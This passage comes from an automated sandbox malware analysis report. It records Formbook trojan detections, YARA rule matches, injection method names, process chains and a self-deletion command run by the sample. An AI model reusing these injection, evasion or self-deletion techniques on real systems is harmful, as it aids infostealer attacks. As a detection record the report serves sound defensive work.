          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036CA9A65_2_036CA9A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0360A8405_2_0360A840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036028405_2_03602840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0362E8F05_2_0362E8F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035E68B85_2_035E68B8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03674F405_2_03674F40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03642F285_2_03642F28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03620F305_2_03620F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036A2F305_2_036A2F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0360CFE05_2_0360CFE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035F2FC85_2_035F2FC8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0367EFA05_2_0367EFA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03600E595_2_03600E59
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BEE265_2_036BEE26
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BEEDB5_2_036BEEDB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03612E905_2_03612E90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BCE935_2_036BCE93
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0360AD005_2_0360AD00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0369CD1F5_2_0369CD1F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035FADE05_2_035FADE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03618DBF5_2_03618DBF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03600C005_2_03600C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035F0CF25_2_035F0CF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036A0CB55_2_036A0CB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035ED34C5_2_035ED34C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B132D5_2_036B132D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0364739A5_2_0364739A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036A12ED5_2_036A12ED
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0361B2C05_2_0361B2C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036052A05_2_036052A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036CB16B5_2_036CB16B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0363516C5_2_0363516C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035EF1725_2_035EF172
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0360B1B05_2_0360B1B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B70E95_2_036B70E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BF0E05_2_036BF0E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036070C05_2_036070C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036AF0CC5_2_036AF0CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BF7B05_2_036BF7B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036456305_2_03645630
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B16CC5_2_036B16CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B75715_2_036B7571
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036C95C35_2_036C95C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0369D5B05_2_0369D5B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035F14605_2_035F1460
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BF43F5_2_036BF43F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BFB765_2_036BFB76
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03675BF05_2_03675BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0363DBF95_2_0363DBF9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0361FB805_2_0361FB80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03673A6C5_2_03673A6C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BFA495_2_036BFA49
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B7A465_2_036B7A46
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036ADAC65_2_036ADAC6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03645AA05_2_03645AA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0369DAAC5_2_0369DAAC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036A1AA35_2_036A1AA3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036099505_2_03609950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0361B9505_2_0361B950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036959105_2_03695910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0366D8005_2_0366D800
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036038E05_2_036038E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BFF095_2_036BFF09
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035C3FD55_2_035C3FD5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_035C3FD25_2_035C3FD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BFFB15_2_036BFFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03601F925_2_03601F92
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03609EB05_2_03609EB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B7D735_2_036B7D73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03603D405_2_03603D40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036B1D5A5_2_036B1D5A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0361FDC05_2_0361FDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03679C325_2_03679C32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_036BFCF25_2_036BFCF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCD5A65_2_00BCD5A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCECC15_2_00BCECC1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BB2D905_2_00BB2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BB2D875_2_00BB2D87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCEEF45_2_00BCEEF4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BB9E605_2_00BB9E60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BB2FB05_2_00BB2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034AA0365_2_034AA036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A5B325_2_034A5B32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A5B305_2_034A5B30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034AB2325_2_034AB232
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A89125_2_034A8912
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A10825_2_034A1082
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A2D025_2_034A2D02
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034AE5CD5_2_034AE5CD
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A15130 appears 58 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A5F290 appears 105 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A4EA12 appears 86 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A27E54 appears 111 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 019CB970 appears 280 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0366EA12 appears 86 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0367F290 appears 105 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 035EB970 appears 280 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03647E54 appears 111 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03635130 appears 58 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 00FE650B appears 97 times
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2003190091.0000000005640000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2003859662.00000000075E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2000343305.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2001034559.0000000002CBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000000.1981834902.00000000009AA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZrEY.exe: vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.0000000001ACD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D22000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exeBinary or memory string: OriginalFilenameZrEY.exe: vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 4196, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 1216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: wlanext.exe PID: 3876, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, GCkChsROVbbw852kkC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, GCkChsROVbbw852kkC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, GCkChsROVbbw852kkC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.tYEY1UeurGz0Mjb.exe.7310000.8.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.tYEY1UeurGz0Mjb.exe.2d4dd08.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.tYEY1UeurGz0Mjb.exe.2cb6eec.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@13/9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FE3355 memset,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_00FE3355
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tYEY1UeurGz0Mjb.exe.logJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: tYEY1UeurGz0Mjb.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: tYEY1UeurGz0Mjb.exeReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess created: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeProcess created: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"Jump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeSection loaded: msasn1.dllJump to behavior
